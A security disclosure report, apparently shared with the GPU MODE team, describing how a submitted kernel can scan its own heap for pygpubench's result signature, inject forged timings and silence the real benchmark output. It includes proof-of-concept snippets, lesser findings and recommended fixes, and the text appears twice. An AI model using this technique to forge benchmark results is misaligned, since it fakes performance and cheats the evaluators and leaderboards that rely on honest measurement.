Summary
pygpubench authenticates benchmark results using a random signature that is sent from the parent process to the child process over a pipe. The child's C++ code stores this signature in a std::string on the heap. Because the child process can read its own /proc/self/maps and scan heap memory with ctypes, it can extract the signature, write forged results to the inherited pipe fd, and redirect the pipe to /dev/null before the C++ benchmark loop runs. The parent accepts the forged results because they contain the correct signature.
This is a complete benchmark bypass: the attacker controls all reported times, error counts, and completion status without running a real kernel.
Severity
Critical — full benchmark integrity failure for any problem using do_bench_isolated.
Affected Component
pygpubench.do_bench_isolated — specifically the signature-based result authentication in python/pygpubench/__init__.py:230-259 and the signature storage in csrc/manager.cpp:127.
Root Cause
The signature is a shared secret between the parent and child processes. It is transmitted to the child over a pipe (sig_r/sig_w), read by the C++ code in read_benchmark_parameters, and stored in BenchmarkManager::mSignature (a std::string member). The untrusted kernel is imported after the signature is already in child-process memory. Since the child process runs attacker-controlled Python code, the attacker can read arbitrary process memory using ctypes and recover the signature.
Why existing defenses don't prevent this
| Defense |
Why it doesn't help |
PR_SET_DUMPABLE=0 |
Prevents other processes from reading /proc/PID/mem. Does not affect the process reading its own /proc/self/maps (inode mode S_IRUGO = 0444, world-readable). Does not affect ctypes memory access (direct pointer dereference, no filesystem I/O). |
| Landlock |
Allows read-only access to / (covers procfs). Allows read-write access to /dev (needed for /dev/null redirect). Does not restrict ctypes or os.write to inherited pipe fds. |
PR_SET_NO_NEW_PRIVS |
Prevents privilege escalation. Does not restrict memory reads within the process. |
| C++ benchmark loop |
Runs after the kernel is imported. The exploit injects forged results at import time, before the benchmark loop starts. |
| Error counter randomization |
Irrelevant — the exploit forges the error-count field directly in the pipe output, bypassing the GPU-side counter entirely. |
The attack chain
Parent Child (subprocess)
────── ──────────────────
secrets.token_hex(16) → signature
write signature to sig_w pipe ──────────────► C++ reads sig_r → mSignature (heap)
C++ calls setup_benchmark()
C++ installs landlock
C++ calls kernel_from_qualname()
└─► import submission ◄──── ATTACKER CODE RUNS HERE
├─ gc.get_objects() → count tuples → repeats
├─ open("/proc/self/maps") → heap regions
├─ ctypes.string_at(heap) → signature
├─ os.fstat(0..255) → pipe fd
├─ os.write(pipe_fd, forged_results + signature)
├─ os.dup2(/dev/null, pipe_fd)
└─ define correct kernel()
C++ benchmark loop runs (writes go to /dev/null)
process exits with code 0
reads pipe → forged data ◄────────────
validates signature → PASS
accepts forged times (0.42 µs)
Proof of Concept
File: submission_memscan_signature.py
The PoC runs entirely at import time (before the C++ benchmark loop executes):
# Step 1: Count (tensor, rtol, atol) tuples in gc → infer repeats
for obj in gc.get_objects():
if isinstance(obj, tuple) and len(obj) == 3:
a, b, c = obj
if isinstance(a, torch.Tensor) and a.is_cuda and isinstance(b, float) ...
expected_count += 1
repeats = expected_count - 1 # subtract warmup slot
# Step 2: Read /proc/self/maps, scan heap for 32-char hex string
with open('/proc/self/maps') as f:
for line in f:
start, end = parse_address_range(line)
data = ctypes.string_at(start, end - start)
for match in re.finditer(rb'(?<![0-9a-f])([0-9a-f]{32})\x00', data):
candidates.append(match.group(1).decode())
# Step 3: Find pipe fd
for fd in range(256):
if stat.S_ISFIFO(os.fstat(fd).st_mode):
pipe_fds.append(fd)
# Step 4: Write forged results with extracted signature
payload = "event-overhead\t0.002 us\n"
for i in range(repeats):
payload += f"{i}\t0.42\n" # 0.42 µs per iteration
payload += f"signature\t{signature}\n"
os.write(pipe_fd, payload.encode())
# Step 5: Redirect pipe to /dev/null (C++ output goes nowhere)
os.dup2(os.open('/dev/null', os.O_WRONLY), pipe_fd)
# Step 6: Correct kernel so process exits cleanly (exit code 0)
def kernel(output, inp):
torch.sum(inp * weights, dim=-1, out=output)
Running the PoC
cd pygpubench/exploits
python run_all.py submission_memscan_signature
Expected output: CHEAT SUCCEEDED (bypassed detection) — the benchmark reports 0.42 µs per iteration with no errors, despite the kernel not being the one that was timed.
Prerequisites
- Linux (for
/proc/self/maps and landlock)
- CUDA GPU (for torch tensor operations)
- pygpubench installed (
pip install pygpubench)
Additional Findings
GC metadata leakage (HIGH)
At kernel import time, gc.get_objects() reveals all expected-output tuples (tensor, rtol, atol) created by the test generator. Even though the tensor data has been zeroed, the Python tuple objects are still alive because the C++ std::vector<nb::tuple> holds strong references. This reveals:
- Exact
repeats value — needed to construct correctly-sized forged results
- Output tensor shapes and dtypes — useful for other exploit strategies
- Tolerance values — useful for crafting outputs that barely pass
The signature exploit depends on this to know how many iteration results to forge.
Source: csrc/manager.cpp:143-166 — setup_benchmark stores tuples in vectors that persist through do_bench_py.
Fix: After copying expected data to C++ memory, release the Python tuple references (expected.clear()) and call gc.collect() before importing the kernel.
Warmup detection (MEDIUM)
The warmup phase always uses args.at(0) (csrc/manager.cpp:301-324). The kernel can detect warmup by tracking input.data_ptr() (same pointer every warmup call, different pointer for benchmark calls) and add artificial delay to inflate time_estimate, reducing actual_calls to the minimum of 3.
Fix: Randomize which test case is used for warmup.
NaN wildcard in checker (LOW, latent)
csrc/check.cu:44-46 treats NaN in expected output as a wildcard:
if (isnan(a))
return; // accepts ANY received value
Currently not exploitable because expected outputs are in non-torch cudaMalloc memory at unknown addresses. But if any future attack vector reveals those addresses, NaN injection would bypass correctness entirely.
Fix: Remove the NaN wildcard. Treat NaN in expected output as a test-generation bug and fail the benchmark.
ctypes CUDA runtime access (LOW, latent)
The submission can call CUDA runtime functions via ctypes.CDLL('libcudart.so') — including cudaMemcpy, cudaMemset, and cudaPointerGetAttributes. Combined with heuristics about cudaMalloc allocation patterns, this could theoretically locate expected output copies or the error counter in GPU memory.
Currently impractical because: (a) the error counter has a random offset + random shift in a 2 MiB arena, and (b) expected output addresses are not predictable. But this is a latent risk.
Fix: Consider seccomp filters to restrict CUDA-related ioctl syscalls to only the specific ioctls needed for kernel launch and synchronization.
Recommended Fixes
For the signature bypass (critical)
Option A: HMAC-based authentication (minimal change)
- At C++ init time (before any user code), read 32 bytes from
/dev/urandom into a local C++ variable
- Send these bytes to the parent over a one-way pipe (parent reads, child writes, pipe is closed)
- After the benchmark loop, compute HMAC-SHA256 over the raw result bytes using the key
- Append the HMAC tag to the pipe output
- Overwrite the key in memory (
memset_explicit) before importing the kernel
- The parent recomputes the HMAC and rejects mismatches
Since the key is consumed and explicitly overwritten before the kernel is imported, memory scanning cannot recover it.
Option B: Separate validator process (stronger)
Run the benchmark in a three-process architecture:
- Orchestrator (trusted): generates test cases, owns the result pipe
- Worker (untrusted): runs the kernel, writes raw timing events to a pipe
- Validator (trusted, never imports submission): reads the same inputs, runs the reference kernel, compares outputs
The worker never sees expected outputs or authentication keys.
For GC metadata leakage
// In do_bench_py, after copying expected outputs:
expected.clear(); // release Python tuple references
trigger_gc(); // clean up
// THEN import the kernel
For warmup detection
// Instead of always using args.at(0):
std::uniform_int_distribution<int> warmup_dist(0, calls);
int warmup_idx = warmup_dist(rng);
// Use args.at(warmup_idx) for warmup
For NaN wildcard
// In check_approx_match_kernel:
if (isnan(a)) {
++res; // NaN in expected = test bug, not wildcard
return;
}
What pygpubench Gets Right
Despite this finding, pygpubench is a massive improvement over the original evaluator:
| Attack class |
Original evaluator |
pygpubench |
__code__ patching |
Trivially exploitable |
Fully blocked (C++ implementation) |
torch.cuda.Event patching |
Trivially exploitable |
Fully blocked (C CUDA API) |
| GC NaN injection on expected outputs |
N/A (no protection) |
Blocked (cudaMalloc copy + zeroing) |
| GC answer copy |
N/A (no protection) |
Blocked (expected data zeroed) |
| Stream-based timing manipulation |
N/A (no protection) |
Blocked (programmatic stream serialization + randomized block checking) |
| Filesystem tampering |
N/A (no sandboxing) |
Blocked (landlock) |
| Error counter manipulation |
N/A (no counter) |
Effectively blocked (random offset + shift) |
| Input caching |
N/A (no protection) |
Blocked (shadow args + canaries + L2 clear) |
The old Class 1 (__code__ patching) and Class 2 (timing infrastructure patching) exploits that affected every leaderboard on gpumode.com/home are completely eliminated. The remaining signature bypass requires significantly more sophistication and is straightforward to fix.
Disclosure Timeline
| Date |
Event |
| 2026-03-07 |
Original evaluator vulnerability disclosed to GPU MODE team |
| 2026-03-07 |
GPU MODE responds, points to pygpubench as the replacement |
| 2026-03-07 |
pygpubench security review conducted; signature bypass identified |
| 2026-03-07 |
This report and PoC prepared |
Files
Summary
pygpubench authenticates benchmark results using a random signature that is sent from the parent process to the child process over a pipe. The child's C++ code stores this signature in a
std::stringon the heap. Because the child process can read its own/proc/self/mapsand scan heap memory withctypes, it can extract the signature, write forged results to the inherited pipe fd, and redirect the pipe to/dev/nullbefore the C++ benchmark loop runs. The parent accepts the forged results because they contain the correct signature.This is a complete benchmark bypass: the attacker controls all reported times, error counts, and completion status without running a real kernel.
Severity
Critical — full benchmark integrity failure for any problem using
do_bench_isolated.Affected Component
pygpubench.do_bench_isolated— specifically the signature-based result authentication inpython/pygpubench/__init__.py:230-259and the signature storage incsrc/manager.cpp:127.Root Cause
The signature is a shared secret between the parent and child processes. It is transmitted to the child over a pipe (
sig_r/sig_w), read by the C++ code inread_benchmark_parameters, and stored inBenchmarkManager::mSignature(astd::stringmember). The untrusted kernel is imported after the signature is already in child-process memory. Since the child process runs attacker-controlled Python code, the attacker can read arbitrary process memory usingctypesand recover the signature.Why existing defenses don't prevent this
PR_SET_DUMPABLE=0/proc/PID/mem. Does not affect the process reading its own/proc/self/maps(inode modeS_IRUGO = 0444, world-readable). Does not affectctypesmemory access (direct pointer dereference, no filesystem I/O)./(covers procfs). Allows read-write access to/dev(needed for/dev/nullredirect). Does not restrictctypesoros.writeto inherited pipe fds.PR_SET_NO_NEW_PRIVSerror-countfield directly in the pipe output, bypassing the GPU-side counter entirely.The attack chain
Proof of Concept
File: submission_memscan_signature.py
The PoC runs entirely at import time (before the C++ benchmark loop executes):
Running the PoC
cd pygpubench/exploits python run_all.py submission_memscan_signatureExpected output:
CHEAT SUCCEEDED (bypassed detection)— the benchmark reports 0.42 µs per iteration with no errors, despite the kernel not being the one that was timed.Prerequisites
/proc/self/mapsand landlock)pip install pygpubench)Additional Findings
GC metadata leakage (HIGH)
At kernel import time,
gc.get_objects()reveals all expected-output tuples(tensor, rtol, atol)created by the test generator. Even though the tensor data has been zeroed, the Python tuple objects are still alive because the C++std::vector<nb::tuple>holds strong references. This reveals:repeatsvalue — needed to construct correctly-sized forged resultsThe signature exploit depends on this to know how many iteration results to forge.
Source:
csrc/manager.cpp:143-166—setup_benchmarkstores tuples in vectors that persist throughdo_bench_py.Fix: After copying expected data to C++ memory, release the Python tuple references (
expected.clear()) and callgc.collect()before importing the kernel.Warmup detection (MEDIUM)
The warmup phase always uses
args.at(0)(csrc/manager.cpp:301-324). The kernel can detect warmup by trackinginput.data_ptr()(same pointer every warmup call, different pointer for benchmark calls) and add artificial delay to inflatetime_estimate, reducingactual_callsto the minimum of 3.Fix: Randomize which test case is used for warmup.
NaN wildcard in checker (LOW, latent)
csrc/check.cu:44-46treats NaN in expected output as a wildcard:Currently not exploitable because expected outputs are in non-torch
cudaMallocmemory at unknown addresses. But if any future attack vector reveals those addresses, NaN injection would bypass correctness entirely.Fix: Remove the NaN wildcard. Treat NaN in expected output as a test-generation bug and fail the benchmark.
ctypes CUDA runtime access (LOW, latent)
The submission can call CUDA runtime functions via
ctypes.CDLL('libcudart.so')— includingcudaMemcpy,cudaMemset, andcudaPointerGetAttributes. Combined with heuristics aboutcudaMallocallocation patterns, this could theoretically locate expected output copies or the error counter in GPU memory.Currently impractical because: (a) the error counter has a random offset + random shift in a 2 MiB arena, and (b) expected output addresses are not predictable. But this is a latent risk.
Fix: Consider
seccompfilters to restrict CUDA-relatedioctlsyscalls to only the specific ioctls needed for kernel launch and synchronization.Recommended Fixes
For the signature bypass (critical)
Option A: HMAC-based authentication (minimal change)
/dev/urandominto a local C++ variablememset_explicit) before importing the kernelSince the key is consumed and explicitly overwritten before the kernel is imported, memory scanning cannot recover it.
Option B: Separate validator process (stronger)
Run the benchmark in a three-process architecture:
The worker never sees expected outputs or authentication keys.
For GC metadata leakage
For warmup detection
For NaN wildcard
What pygpubench Gets Right
Despite this finding, pygpubench is a massive improvement over the original evaluator:
__code__patchingtorch.cuda.EventpatchingThe old Class 1 (
__code__patching) and Class 2 (timing infrastructure patching) exploits that affected every leaderboard on gpumode.com/home are completely eliminated. The remaining signature bypass requires significantly more sophistication and is straightforward to fix.Disclosure Timeline
Files